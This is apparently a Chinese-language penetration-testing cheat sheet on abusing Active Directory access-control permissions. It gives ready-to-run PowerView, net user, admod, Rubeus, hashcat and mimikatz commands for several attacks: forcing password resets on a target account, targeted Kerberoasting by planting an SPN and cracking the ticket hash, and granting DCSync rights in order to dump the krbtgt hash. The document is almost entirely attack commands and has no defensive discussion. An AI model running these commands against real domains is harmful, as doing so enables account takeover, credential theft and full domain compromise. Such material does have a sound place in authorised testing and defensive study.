DACL滥用On_User&DCSync

On User

这里是让给test1对fileserver有完全控制权限

Change Password

• 所有可利用权限：

  • GenericAll

  • WriteDACL

    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity
     test1 -Rights ResetPassword -Verbose
    # 使用writeDACL添加强制改密码的权限

    

    
  • 所有扩展权限，powerview枚举出来的如果没有给详细的扩展权限就是拥有所有的扩展权限

  • 强制更改密码(重置密码)，powerview枚举出来的ObjectAceType为00299570-246d-11d0-a768-00aa006e0529

  拥有GenericAll才能使用net user来更改密码，否则要使用admod

net user fileserver "QWEasd1234" /domain

admod  -b CN=fileserver,CN=Users,DC=fbi,DC=gov unicodepwd::QWEasd123456 -optenc
# 更改密码为QWEasd123456

Add SPN (Kerberoasting)

• 所有可利用权限：

  • GenericAll

  • GenericWrite

  • WriteProperty

  • WriteOwner

  • WriteDACL

    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity
     test1 -Rights all -Verbose
     # 添加GenericAll

Set-DomainObject -Credential $creds -Identity fbi\fileserver -Set @{serviceprincipalname="MS
SQL/Sqllserver"}
# 给fileserver用户设置spn，因为与机器同名所有使用fbi\fileserver区分机器

.\Rubeus.exe kerberoast /user:fileserver /nowrap
# 获取hash

Set-DomainObject -Credential $creds -Identity fbi\fileserver -Clear serviceprincipalname -Ver
bose
# 清除spn

获取hash拿到hashcat破解即可

hashcat.exe -m 13100 spnhash.txt pwd.txt --force

DCSync

配置

利用

lsadump::dcsync /domain:fbi.gov /user:krbtgt

• 所有可利用权限

  • GenericAll

  • 所有扩展权限

  • 复制目录更改所有项(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)+复制目录更改(1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

    

    
  • WriteDACL

    Add-DomainObjectAcl -TargetIdentity "DC=fbi,DC=gov" -PrincipalIdentity test1 -Rights DCSync -Verbose
    # 给test1用户添加DCSync权限，这里额外添加了 正在复制筛选集中的目录更改 权限，经过测试是不需要这个权限的